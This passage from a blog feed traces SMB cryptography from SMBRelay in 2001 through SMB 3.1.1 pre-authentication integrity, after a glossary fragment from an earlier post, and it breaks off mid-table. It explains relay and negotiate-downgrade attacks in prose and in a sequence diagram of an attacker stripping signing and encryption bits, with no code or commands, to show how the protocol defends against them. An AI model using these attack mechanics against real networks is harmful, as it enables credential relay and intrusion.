  { term: &quot;KB 2871997&quot;, definition: &quot;Microsoft Security Advisory of May 13, 2014; added TokenLeakDetectDelaySecs, the Protected Users group, and LSA Protection / RunAsPPL to mitigate the credential leakage class disclosed in 2014.&quot; },
  { term: &quot;Protected Users&quot;, definition: &quot;A Windows Server 2012 R2 security group whose members cannot use NTLM, DES, or RC4 in Kerberos pre-auth and cannot delegate.&quot; },
  { term: &quot;Credential Guard&quot;, definition: &quot;VBS-based isolation of LSA credential material in the LSAISO container; enabled by default on Windows 11 22H2 and Windows Server 2025 hardware-eligible domain-joined systems.&quot; },
  { term: &quot;RFC 8070&quot;, definition: &quot;PKINIT Freshness Extension, February 2017. Adds a KDC-issued freshness token to the signed PKAuthenticator, closing the relay window present in RFC 4556.&quot; },
  { term: &quot;WHfB key-trust&quot;, definition: &quot;Windows Hello for Business deployment in which the TPM-bound public key is registered directly with the identity provider (Microsoft Entra ID); no X.509 certificate is required.&quot; },
  { term: &quot;WHfB cert-trust&quot;, definition: &quot;Windows Hello for Business deployment in which an X.509 certificate is issued for the TPM-bound key by an enterprise PKI, allowing PKINIT-style authentication to downstream services.&quot; },
  { term: &quot;Microsoft Platform Crypto Provider&quot;, definition: &quot;A CNG KSP that talks directly to the TPM, used by Windows Hello for Business and by other modern Windows components that want TPM-bound keys without the smart card abstraction layer.&quot; },
  { term: &quot;FIDO2&quot;, definition: &quot;The FIDO Alliance and W3C specifications (WebAuthn and CTAP) for public-key authentication to relying parties, with origin binding to the RP ID.&quot; },
  { term: &quot;WebAuthn&quot;, definition: &quot;The W3C Web Authentication API; the relying-party-facing part of FIDO2.&quot; },
  { term: &quot;RP ID&quot;, definition: &quot;Relying Party Identifier. In WebAuthn, the domain name or registrable suffix to which a credential is scoped; the authenticator refuses to sign assertions for any other RP ID.&quot; }
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>smart-cards</category><category>virtual-smart-cards</category><category>pkinit</category><category>kerberos</category><category>windows-security</category><category>tpm</category><category>windows-hello-for-business</category><category>fido2</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>The Connection That Refused to Downgrade: Twenty-Five Years of SMB Cryptography, Finally Default-On</title><link>https://paragmali.com/blog/the-connection-that-refused-to-downgrade-twenty-five-years-o/</link><guid isPermaLink="true">https://paragmali.com/blog/the-connection-that-refused-to-downgrade-twenty-five-years-o/</guid><description>How SMB 3.1.1 pre-authentication integrity, AES-256-GCM, and SMB-over-QUIC closed a 25-year attack tradition, and which attacks still survive in 2026.</description><pubDate>Tue, 26 May 2026 00:00:00 GMT</pubDate><content:encoded>
**SMB 3.1.1 closed the 25-year-old negotiate-downgrade attack in 2015, but the defaults did not catch up until October 2024.** Pre-authentication integrity hashes every byte of NEGOTIATE and SESSION_SETUP into the SP 800-108 KDF salt, so any tampering produces divergent session keys rather than detectable mismatches. Windows 11 24H2 and Server 2025 finally make SMB signing required by default; encryption is now mandate-able but remains opt-in. The attacks that still work (PetitPotam) route around SMB entirely.
&lt;h2&gt;1. Three Failures in a Coffee Shop&lt;/h2&gt;
&lt;p&gt;A laptop opens its first SMB connection to a corporate file share over the wifi of a coffee shop. An attacker on the same network, holding the same family of relay tooling that Sir Dystic first demonstrated on &lt;strong&gt;March 31, 2001 at @lanta.con in Atlanta&lt;/strong&gt; [@smbrelay-cdc], watches three packets go by: a NEGOTIATE Request, a NEGOTIATE Response, and an authenticated SESSION_SETUP that finishes with a signed READ.&lt;/p&gt;
&lt;p&gt;She tries to relay the credentials to a neighbouring server. She tries to strip the signing-required bit from the NEGOTIATE Response. She tries to inject ciphertext she captured from a previous session of the same user.&lt;/p&gt;
&lt;p&gt;All three attempts fail. None of them touch the contents of the file.&lt;/p&gt;
&lt;p&gt;That outcome is the 2026 default behaviour of a Windows 11 24H2 client talking to a Windows Server 2025 file server [@pyle-techcom-4226591][@smb-security-hardening]. And it is the punch line of a story that took twenty-five years to land.&lt;/p&gt;

This topic was discussed on March 31, 2001 at @lanta.con in Atlanta, Georgia. -- Sir Dystic, cDc disclosure page for SMBRelay [@smbrelay-cdc]
&lt;p&gt;Sir Dystic was the cDc handle of the researcher who shipped the first practical SMB relay tool.&quot;Sir Dystic&quot; is a cult of the Dead Cow pseudonym. The cDc primary disclosure page names only the handle; a legal name attributed in secondary press is not load-bearing for this article, and the primary citation stays with the pseudonym [@smbrelay-cdc]. His attack relayed a client&apos;s &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLM&lt;/a&gt; challenge response, captured on the wire, into a fresh SMB session against another host where that user already had credentials.&lt;/p&gt;
&lt;p&gt;The technique generalised, and &quot;SMB relay&quot; became a generic term for an attack family that has, over the intervening years, eaten domain controllers, file shares, and Active Directory Certificate Services enrollment endpoints.&lt;/p&gt;
&lt;p&gt;This article walks the twenty-five-year arc of cryptographic responses to that attack family: how each retrofit before 2015 left a load-bearing weakness in the NEGOTIATE handshake; how SMB 3.1.1 closed that weakness with a mechanism that is usually misremembered; how SMB-over-QUIC arrived in 2021 as a parallel transport; how the October 2024 default-on flip in Windows 11 24H2 finally made signing mandatory on every share, not just SYSVOL and NETLOGON [@smb-security-hardening]; and what attacks the SMB team designed against still work in 2026, by routing around SMB entirely.&lt;/p&gt;
&lt;p&gt;There will be three aha moments. The first arrives at the end of section 3: every defence before 2015 was applied after-the-fact to a message an attacker already controlled. The second arrives in section 4: pre-authentication integrity is not a signed negotiate, it is a hash chain that becomes a key-derivation salt. The third arrives in section 6: SMB is now cryptographically sufficient at the wire layer, and the attacks that still matter coerce SMB and relay the authentication somewhere else.&lt;/p&gt;
&lt;p&gt;To see why the attacker&apos;s toolkit failed in 2026, and why the same toolkit worked everywhere from 2001 to 2023, we have to start in 1983.&lt;/p&gt;
&lt;h2&gt;2. The Cleartext Era and the Birth of the Relay Class&lt;/h2&gt;
&lt;p&gt;Barry Feigenbaum designed SMB at IBM Boca Raton in 1983 [@ms-cifs-landing] as a way to make a PC&apos;s open-file table look like it lived on a server. It ran on a single LAN segment, behind a desk, in a room where the only adversary was someone who walked in the door. There was no notion of an attacker on the wire because there was no wire to attack: the protocol predated TCP/IP&apos;s commercial reach by a decade.&lt;/p&gt;
&lt;p&gt;Microsoft adopted the design for LAN Manager in 1987 and carried it into Windows NT in 1993 [@ms-cifs-landing]. Paul Leach&apos;s 1996-1997 IETF draft, eventually known as &lt;code&gt;draft-leach-cifs-v1-spec-02&lt;/code&gt; [@leach-cifs-draft], rebranded the protocol as the &lt;strong&gt;Common Internet File System&lt;/strong&gt; and tried to standardise the dialect at IETF.&lt;/p&gt;
&lt;p&gt;The standardisation effort stalled, but the brand stuck for a decade. The normative SMB1 / CIFS reference today is the Microsoft &lt;code&gt;[MS-CIFS]&lt;/code&gt; open specification [@ms-cifs-landing], which still records the SMB1 dialect strings &lt;code&gt;PC NETWORK PROGRAM 1.0&lt;/code&gt;, &lt;code&gt;MICROSOFT NETWORKS 1.03&lt;/code&gt;, &lt;code&gt;LANMAN1.0&lt;/code&gt;, and &lt;code&gt;NT LM 0.12&lt;/code&gt; that the protocol negotiates at hello.&lt;/p&gt;

Paul Leach (Microsoft) circulated a CIFS Internet Draft at the IETF in 1996-1997 [@leach-cifs-draft], hoping to take SMB through the standards-track process. Microsoft kept revising the spec internally; the IETF draft never advanced to RFC. The &quot;CIFS&quot; name persisted as marketing for SMB1 well after Microsoft had moved on to SMB 2.0 in 2006, which is why product documentation continued to refer to &quot;CIFS shares&quot; through the 2010s even though the wire protocol had changed twice. Today the only meaningful use of the word is as a label for the SMB1 wire dialect family, normatively documented in `[MS-CIFS]` [@ms-cifs-landing].
&lt;p&gt;In parallel, Andrew Tridgell at the Australian National University started reverse-engineering the SMB wire protocol so he could mount a DEC Pathworks server from his Linux box. His first tentative code appeared in early 1992 [@samba-10years]; that codebase grew into Samba, which is the canonical open-source SMB server in 2026 and ships every algorithm matrix the Microsoft client expects to negotiate.&lt;/p&gt;
&lt;p&gt;Microsoft added SMB1 to the Windows Server 2012 R2 deprecation list in &lt;strong&gt;June 2013&lt;/strong&gt;, in advance of the Server 2012 R2 October 2013 release, per Jose Barreto&apos;s 2015 TechNet post (preserved via the Wayback Machine) [@barreto-archive]. &quot;Deprecation&quot; meant the feature was marked for potential removal in subsequent releases, not yet removed. The actual default-off step came with Windows 10 1709 in the Fall Creators Update and Windows Server 2019 [@smb-interception-defense].&lt;/p&gt;

A family of attacks that captures a client&apos;s authentication exchange on the wire and replays it, in real time, into a fresh authenticated session against a different target where the same user already has access. The defining property is that the attacker never learns the plaintext credential; she only needs to ferry the cryptographic responses between two sockets. Originally demonstrated by Sir Dystic for SMB on March 31, 2001 [@smbrelay-cdc], the class generalised to NTLM-over-HTTP, NTLM-over-LDAP, NTLM-over-DCOM, and eventually to cross-protocol variants like PetitPotam that coerce SMB authentication and relay it to ADCS Web Enrollment over HTTPS.
&lt;h3&gt;The 2001 disclosure&lt;/h3&gt;
&lt;p&gt;Sir Dystic&apos;s SMBRelay was a small Windows binary that ran a fake SMB server, accepted a connection from a victim, captured the NTLM challenge-response, and immediately forwarded that response to a real SMB server where the victim had access. The technique worked because SMB1 signing was opt-in by default; on a typical Windows network in 2001, signing was negotiated for connections to SYSVOL and NETLOGON on a domain controller and almost nowhere else. Microsoft&apos;s response at the time was that signing existed and could be turned on. Technically correct; politically untenable.&lt;/p&gt;
&lt;p&gt;The &quot;almost nowhere else&quot; matters. SMB1 did support signing, and the algorithm was a truncated MD5 of the packet concatenated with the session key, mediated by a sequence number, per &lt;code&gt;[MS-CIFS]&lt;/code&gt; §3.1.4.1 [@ms-cifs-landing]. It was not an HMAC, and it was not a strong MAC by 2001 cryptographic standards. But that was not the load-bearing weakness. The load-bearing weakness was that the &lt;strong&gt;signing-required bit travelled in the NEGOTIATE Response itself&lt;/strong&gt;, before any session key existed to protect it. An attacker who could rewrite NEGOTIATE could strip the bit; signing was then mutually disabled and the session continued unsigned.&lt;/p&gt;
&lt;p&gt;The cDc primary page dates the disclosure to &lt;em&gt;March 31, 2001&lt;/em&gt;. The Wikipedia article on SMBRelay says March 21, 2001, and a chain of secondary press has repeated the March 21 date. The primary disclosure page is the dispositive source; the article uses March 31 [@smbrelay-cdc].&lt;/p&gt;
&lt;h3&gt;The 2008 patch&lt;/h3&gt;
&lt;p&gt;Seven years and eight months later, on &lt;strong&gt;November 11, 2008&lt;/strong&gt;, Microsoft shipped MS08-068, which addressed CVE-2008-4037, the same-host SMB credential reflection vulnerability [@ms08-068][@nvd-cve-2008-4037]. The fix changed how SMB authentication replies were validated so that an attacker could no longer reflect a client&apos;s credentials back to the &lt;em&gt;same host&lt;/em&gt; that initiated the authentication.&lt;/p&gt;
&lt;p&gt;That closed one specific variant of Sir Dystic&apos;s attack. It did not close the cross-host case, where the attacker forwards credentials to a different SMB server that the victim has access to. That case was the architectural shape that future relay tooling like Impacket&apos;s &lt;code&gt;smbrelayx&lt;/code&gt; exploited for years.&lt;/p&gt;
&lt;p&gt;What MS08-068 demonstrated, more than anything else, was the cost of fixing a protocol with a single-issue patch when the load-bearing weakness was structural. The 2001 disclosure named the class. The 2008 patch closed one variant. The next defence was not another bulletin, and it was not going to be another patch. It was a complete redesign of the SMB header model and a new dialect family.&lt;/p&gt;

gantt
    title SMB cryptographic generations
    dateFormat YYYY
    axisFormat %Y
    section SMB1
    Cleartext on the LAN          :1983, 1996
    MD5 signing (opt-in)          :1997, 2006
    section SMB 2.x
    HMAC-SHA-256 signing          :2006, 2012
    section SMB 3.x
    AES-CMAC and AES-128-CCM      :2012, 2013
    Secure Negotiate FSCTL        :2013, 2015
    section SMB 3.1.1
    Pre-auth integrity, AES-128-GCM :2015, 2021
    AES-256 ciphers, AES-GMAC, SMB-over-QUIC :2021, 2024
    Signing required by default   :2024, 2026
&lt;h2&gt;3. Five Retrofits Before the Real Fix&lt;/h2&gt;
&lt;p&gt;Between 2006 and 2013, Microsoft tried four different cryptographic primitives and one post-hoc validation message. None of them closed the negotiate-downgrade primitive that SMBRelay opened.&lt;/p&gt;
&lt;h3&gt;SMB 2.0 (November 8, 2006) [@ms-smb2-versioning]&lt;/h3&gt;
&lt;p&gt;Windows Vista RTM shipped a redesigned SMB header. The protocol still carried a sequence number, but the per-packet signature now came from HMAC-SHA-256 keyed by the session key derived from authentication, not from a truncated MD5 [@ms-smb2-versioning]. The new MAC closed all the trivial attacks on the signing algorithm itself.&lt;/p&gt;
&lt;p&gt;But signing was still opt-in: a typical Windows network ran it only between domain controllers and member servers, not between general clients and file shares. And the NEGOTIATE Response still travelled unsigned, so the signing-required bit was still strippable by an in-path attacker.&lt;/p&gt;

A keyed message authentication code, defined in RFC 2104 with SHA-256 as the underlying hash, that produces a 256-bit tag binding a message and a key. HMAC&apos;s security reduces to the pseudorandomness of the underlying hash compression function; SHA-256 with HMAC has no known practical forgery for any key. SMB 2.0 and later use HMAC-SHA-256 to sign each SMB header when AES-CMAC and AES-GMAC are not negotiated [@ms-smb2-versioning].
&lt;h3&gt;SMB 2.1 (October 22, 2009) [@ms-smb2-versioning]&lt;/h3&gt;
&lt;p&gt;Windows 7 and Server 2008 R2 shipped SMB 2.1, dialect &lt;code&gt;0x0210&lt;/code&gt; [@ms-smb2-versioning]. The dialect introduced opportunistic locks, branch caching, and large MTUs. The cryptographic primitives did not change: HMAC-SHA-256 signing, still opt-in.&lt;/p&gt;
&lt;h3&gt;SMB 3.0 (October 26, 2012) [@ms-smb2-versioning]&lt;/h3&gt;
&lt;p&gt;Windows 8 and Server 2012 shipped the first cryptographically modern SMB dialect, &lt;code&gt;0x0300&lt;/code&gt; [@ms-smb2-versioning]. It introduced three things at once:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;AES-CMAC signing&lt;/strong&gt;, the NIST SP 800-38B [@nist-sp-800-38b] block-cipher MAC, swapping the SHA-256 compression function for an AES-128 cipher operation that runs at hardware speed on chips with AES-NI. The standard identifier in the spec is &quot;AES-CMAC&quot;. Cryptographers will sometimes recognise the same construction as OMAC1 from Iwata and Kurosawa, 2003.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;AES-128-CCM encryption&lt;/strong&gt;, the two-pass AEAD construction from NIST SP 800-38C [@nist-sp-800-38c], which produces an authenticated ciphertext that an attacker cannot tamper with without invalidating the tag.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;A proper SP 800-108 key hierarchy.&lt;/strong&gt; Every per-session signing key, encryption key, and decryption key derives from a session-level secret via the counter-mode HMAC-SHA-256 KDF in NIST SP 800-108 [@nist-sp-800-108r1].&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;This was a real cryptographic upgrade. But it did not close the negotiate-downgrade primitive. An attacker on the wire could still rewrite the NEGOTIATE Response to remove the &lt;code&gt;SMB2_GLOBAL_CAP_ENCRYPTION&lt;/code&gt; capability bit and the &lt;code&gt;SMB2_NEGOTIATE_SIGNING_REQUIRED&lt;/code&gt; bit; the client and server would then agree on a session that was neither signed nor encrypted, and the cryptographic primitives the attacker was trying to defeat were never invoked at all.&lt;/p&gt;

A block-cipher message authentication code standardised in NIST SP 800-38B in 2005 [@nist-sp-800-38b]. CMAC iterates AES in CBC mode over the message and applies a final subkey to the last block. The construction tolerates messages of any length, including the empty message, and has a security bound that matches the generic upper bound for any deterministic MAC built from a pseudorandom permutation. SMB 3.0 through 3.1.1 use AES-CMAC as the default signing algorithm; AES-GMAC, introduced as a negotiable alternative in 2021, replaces it on hardware where Galois-field multiplication is faster than AES-CBC.

Authenticated Encryption with Associated Data. A class of symmetric encryption scheme that simultaneously provides confidentiality of the message body and integrity of both the body and a separate &quot;associated data&quot; header. AES-CCM (SP 800-38C) [@nist-sp-800-38c] and AES-GCM (SP 800-38D) [@nist-sp-800-38d] are the two AEADs SMB 3.x uses. AEADs replace the older &quot;encrypt-then-MAC&quot; or &quot;MAC-then-encrypt&quot; compositions, which historically were a rich source of cryptographic mistakes.
&lt;p&gt;NIST identifies AES-CMAC by the cipher and mode strings; the construction is mathematically equivalent to Tetsu Iwata and Kaoru Kurosawa&apos;s OMAC1 from 2003. SP 800-38B notes the lineage, attributing the design to Iwata-Kurosawa with subsequent refinements by Black-Rogaway [@nist-sp-800-38b].&lt;/p&gt;
&lt;h3&gt;SMB 3.0.2 Secure Negotiate (October 18, 2013) [@ms-smb2-versioning]&lt;/h3&gt;
&lt;p&gt;Windows 8.1 and Server 2012 R2 shipped dialect &lt;code&gt;0x0302&lt;/code&gt; with a post-hoc validation message: &lt;code&gt;FSCTL_VALIDATE_NEGOTIATE_INFO&lt;/code&gt;. The idea was that after authentication, the client would send the server its view of what NEGOTIATE looked like, signed by the freshly-derived session key. The server compared the client&apos;s view against its own, and if they disagreed, the connection terminated. This was the first protocol-level attempt to detect negotiate-downgrade in SMB. It is also, retrospectively, the most instructive failure.&lt;/p&gt;
&lt;p&gt;Secure Negotiate had five structural limits, and each of them mattered:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;It was post-hoc, not preventive.&lt;/strong&gt; The session key was already derived. The encryption capability was already mutually decided. If an attacker had stripped encryption, you were going to &lt;em&gt;detect&lt;/em&gt; that you were in a degraded session and tear it down. You were not going to prevent the degradation in the first place.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;The FSCTL was skippable.&lt;/strong&gt; A pre-3.0 client did not send &lt;code&gt;FSCTL_VALIDATE_NEGOTIATE_INFO&lt;/code&gt;. An attacker who downgraded a 3.0.2 client to 2.0 simply got a session that never asked the question.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;It validated capability bits, not every byte of NEGOTIATE.&lt;/strong&gt; The FSCTL message contained a fixed structure with specific fields. Tampering that did not touch those specific fields could survive validation.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;It inherited the dialect-monopoly extensibility flaw.&lt;/strong&gt; Adding a new capability meant adding a new bit to the capability bitmap, which the Secure Negotiate FSCTL would also have to learn about. The structure was not future-proof.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;It was trust-on-second-use, not first-use.&lt;/strong&gt; The signed FSCTL validated &lt;em&gt;that this session&apos;s NEGOTIATE was not tampered with&lt;/em&gt; only after authentication had completed. The first message of authentication itself, where the attacker could rewrite signing requirements, was still vulnerable.&lt;/li&gt;
&lt;/ol&gt;

An attack on a protocol with an in-band cryptographic capability negotiation in which an in-path attacker tampers with the negotiation messages so that the two endpoints agree on a weaker algorithm, or no algorithm at all. SMB-relay-class attacks before 2015 universally relied on negotiate-downgrade: the attacker stripped the `SMB2_NEGOTIATE_SIGNING_REQUIRED` bit from the NEGOTIATE Response, and the resulting session was unsigned and forwardable. The structural defence against negotiate-downgrade is to bind every byte of the negotiation transcript into the key-derivation function, which is what TLS 1.2 Finished and SMB 3.1.1 pre-authentication integrity both do, by different mechanics.
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Every SMB defence before 2015 was a tag applied after-the-fact to a message an attacker already controlled. Signing was opt-in. The signing-required bit was strippable during unsigned NEGOTIATE. Secure Negotiate detected tampering only after the attacker had already chosen what to tamper with. The shape of the fix is forced once you state the flaw this way: the negotiation has to bind into the key-derivation function itself, so that tampering does not produce a detectable mismatch -- it produces session keys that simply do not work.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Five generations, one column&lt;/h3&gt;
&lt;p&gt;The shape of the failure is easiest to see in a table.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Generation&lt;/th&gt;
&lt;th&gt;Year&lt;/th&gt;
&lt;th&gt;Signing&lt;/th&gt;
&lt;th&gt;Encryption&lt;/th&gt;
&lt;th&gt;NEGOTIATE protection&lt;/th&gt;
&lt;th&gt;Why it failed&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;SMB1 cleartext&lt;/td&gt;
&lt;td&gt;1983-1996&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;No cryptography at all&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMB1 + MD5&lt;/td&gt;
&lt;td&gt;1997-2006&lt;/td&gt;
&lt;td&gt;Opt-in MD5 truncated to 8 bytes&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Signing-required bit strippable in unsigned NEGOTIATE&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMB 2.0 / 2.1&lt;/td&gt;
&lt;td&gt;2006-2012&lt;/td&gt;
&lt;td&gt;HMAC-SHA-256&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Same NEGOTIATE-strip primitive, stronger MAC&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMB 3.0&lt;/td&gt;
&lt;td&gt;2012-2013&lt;/td&gt;
&lt;td&gt;AES-CMAC&lt;/td&gt;
&lt;td&gt;AES-128-CCM&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;Strip the &lt;code&gt;SMB2_GLOBAL_CAP_ENCRYPTION&lt;/code&gt; bit and CCM never runs&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;SMB 3.0.2&lt;/td&gt;
&lt;td&gt;2013-2015&lt;/td&gt;
&lt;td&gt;AES-CMAC&lt;/td&gt;
&lt;td&gt;AES-128-CCM&lt;/td&gt;
&lt;td&gt;Post-hoc FSCTL&lt;/td&gt;
&lt;td&gt;Detection, not prevention; skippable by older clients&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Read the &lt;strong&gt;NEGOTIATE protection&lt;/strong&gt; column top to bottom. &lt;em&gt;None / None / None / None / Post-hoc FSCTL.&lt;/em&gt; Twenty-five years of cryptographic work without a single defence that bound the negotiation transcript to the eventual session key. Then, in 2015, buried in the unremarkable &lt;code&gt;.1&lt;/code&gt; of a &lt;code&gt;.1&lt;/code&gt; dialect bump, the SMB team finally fixed the load-bearing weakness.&lt;/p&gt;

sequenceDiagram
    participant C as Client
    participant M as In-path attacker
    participant S as Server
    C-&amp;gt;&amp;gt;M: NEGOTIATE Request, signing required, ciphers AES-128-CCM
    M-&amp;gt;&amp;gt;S: NEGOTIATE Request, signing required, ciphers AES-128-CCM
    S-&amp;gt;&amp;gt;M: NEGOTIATE Response, signing required, encryption capability set
    M-&amp;gt;&amp;gt;C: NEGOTIATE Response with signing-required bit cleared, encryption capability removed
    Note over C,S: Client and server now agree on an unsigned, unencrypted session
    C-&amp;gt;&amp;gt;M: SESSION_SETUP Request, no signature
    M-&amp;gt;&amp;gt;S: Relayed SESSION_SETUP Request
    Note over M,S: Attacker controls the cleartext channel
&lt;h2&gt;4. The Hash Chain Becomes the Salt&lt;/h2&gt;
&lt;p&gt;On &lt;strong&gt;July 29, 2015&lt;/strong&gt;, Windows 10 RTM (build 10240, version 1507) shipped a protocol that no relay tool released since has been able to downgrade [@win10-release-info]. The fix was not what most readers remember. It was much stranger and much cleaner.&lt;/p&gt;
&lt;p&gt;The dialect was &lt;code&gt;0x0311&lt;/code&gt;, &quot;SMB 3.1.1&quot; [@ms-smb2-versioning]. Greg Kramer and Dan Lovinger of the Microsoft SMB team presented the design at the SNIA Storage Developer Conference that September [@kramer-lovinger-sdc2015]. The deck contains the single most-quoted sentence in modern SMB cryptography:&lt;/p&gt;

Preauthentication Integrity ... Provides end-to-end, dialect agnostic protection. Session&apos;s secret keys derived from hash of the preauthentication messages. -- Greg Kramer and Dan Lovinger, SNIA SDC 2015 [@kramer-lovinger-sdc2015]
&lt;p&gt;Most secondary references to the SDC 2015 deck cite &quot;Greg Kramer&quot; only. The title slide lists two authors: Greg Kramer, Principal Software Engineer, and Dan Lovinger, Principal Software Engineer, both at Microsoft. The 2015 design has two names on it [@kramer-lovinger-sdc2015].&lt;/p&gt;
&lt;p&gt;The misremembered framing of SMB 3.1.1 pre-authentication integrity is that &quot;negotiate contexts are signed by the eventual session key.&quot; That is not what happens. The actual mechanism is more elegant and structurally stronger.&lt;/p&gt;
&lt;h3&gt;The four updates of the hash chain&lt;/h3&gt;
&lt;p&gt;SMB 3.1.1 defines a per-connection variable called &lt;code&gt;PreauthIntegrityHashValue&lt;/code&gt;, initialised to 64 zero bytes [@ms-smb2-pdf]. Across the four messages of the pre-authentication phase, both client and server update it with the same rule:&lt;/p&gt;
&lt;p&gt;$$H_i = \mathrm{SHA{-}512}(H_{i-1} \mathbin{|} M_i)$$&lt;/p&gt;
&lt;p&gt;The four messages are NEGOTIATE Request, NEGOTIATE Response, SESSION_SETUP Request, and SESSION_SETUP Response. After all four are processed, the running hash &lt;code&gt;H_4&lt;/code&gt; contains a cryptographic commitment to every byte that crossed the wire during pre-authentication.&lt;/p&gt;
&lt;p&gt;This commitment has no value if it stays a local variable. The structural move is in the next step. SMB 3.1.1 uses the NIST SP 800-108 counter-mode KDF [@nist-sp-800-108r1] to derive every per-session key from the authentication-protocol session secret (the NTLM &lt;code&gt;ExportedSessionKey&lt;/code&gt; or the &lt;a href=&quot;https://paragmali.com/blog/kerberos-in-windows-the-other-half-of-ntlmless/&quot; rel=&quot;noopener&quot;&gt;Kerberos&lt;/a&gt; service-ticket session key). The KDF takes two arguments alongside the secret: a &lt;code&gt;Label&lt;/code&gt; identifying the role of the derived key, and a &lt;code&gt;Context&lt;/code&gt; argument.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The &lt;code&gt;Context&lt;/code&gt; argument is &lt;code&gt;PreauthIntegrityHashValue&lt;/code&gt;.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;That is the whole trick. The hash chain enters the key-derivation function as salt. It does not protect the negotiation by tagging it; it protects the negotiation by being part of the input to the function that produces the session keys.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; Pre-authentication integrity is not a signed negotiate. It is a SHA-512 hash chain over the four pre-authentication messages whose final value becomes the &lt;code&gt;Context&lt;/code&gt; argument to the SP 800-108 KDF that derives every per-session key. Tampering does not get &lt;em&gt;detected&lt;/em&gt;. Tampering causes the two sides to compute different keys, and the first signed message after SESSION_SETUP simply fails to verify on both ends.&lt;/p&gt;
&lt;/blockquote&gt;

The SMB 3.1.1 mechanism that binds every byte of the four pre-authentication messages (NEGOTIATE Request and Response, SESSION_SETUP Request and Response) into the salt input of the SP 800-108 key-derivation function that derives all per-session SMB keys [@kramer-lovinger-sdc2015][@ms-smb2-pdf]. The bind is constructed by iterating SHA-512 over each pre-authentication message in turn. The mechanism is mandatory in dialect 0x0311; there is no policy switch to disable it.

A family of key-derivation functions standardised by NIST in Special Publication 800-108 [@nist-sp-800-108r1], parameterised by a pseudorandom function (HMAC, KMAC, or CMAC) and a mode (counter, feedback, double-pipeline). SMB 3.x uses CTR-HMAC-SHA-256. The function takes a secret key, a `Label`, a `Context`, and a desired output length, and returns the requested number of bits as a deterministic, distinguishable derivation of the key. In SMB 3.1.1, the `Context` argument is the pre-authentication hash chain; the `Label` is one of four constant strings naming the role of the derived key.
&lt;h3&gt;The four key labels&lt;/h3&gt;
&lt;p&gt;The four per-session keys SMB 3.1.1 derives are tagged with constant &lt;code&gt;Label&lt;/code&gt; strings, lifted directly from [MS-SMB2] §3.2.5.3.1 [@ms-smb2-pdf]:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;&quot;SMBSigningKey&quot;&lt;/code&gt; -- the key used for the per-packet AES-CMAC or AES-GMAC signature.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&quot;SMBAppKey&quot;&lt;/code&gt; -- the application-layer key that some named pipes can use to derive sub-keys.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&quot;SMBC2SCipherKey&quot;&lt;/code&gt; -- the client-to-server AES encryption key, fed to AES-CCM or AES-GCM.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;&quot;SMBS2CCipherKey&quot;&lt;/code&gt; -- the server-to-client encryption key.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each label is passed as the SP 800-108 &lt;code&gt;Label&lt;/code&gt; argument; the same &lt;code&gt;PreauthIntegrityHashValue&lt;/code&gt; is passed as the &lt;code&gt;Context&lt;/code&gt; argument. Different labels produce different keys from the same secret and the same salt; that is what makes role separation work without four separate hash chains.&lt;/p&gt;
&lt;p&gt;The AES-256 ciphers in SMB 3.1.1 consume &lt;code&gt;Session.FullSessionKey&lt;/code&gt; rather than the truncated 16-byte &lt;code&gt;Session.SessionKey&lt;/code&gt; that AES-128 ciphers use [@ms-smb2-pdf]. This is the structural reason an AES-256 SMB session is cryptographically 256-bit-secure rather than capped at 128. The detail matters for anyone evaluating SMB against CNSA 2.0 requirements: the implementation does the right thing, but only because the specification said so explicitly.&lt;/p&gt;
&lt;h3&gt;Why this is stronger than Secure Negotiate&lt;/h3&gt;
&lt;p&gt;Place SMB 3.0.2 Secure Negotiate and SMB 3.1.1 pre-authentication integrity side by side:&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Property&lt;/th&gt;
&lt;th&gt;Secure Negotiate (SMB 3.0.2)&lt;/th&gt;
&lt;th&gt;Pre-auth integrity (SMB 3.1.1)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Coverage&lt;/td&gt;
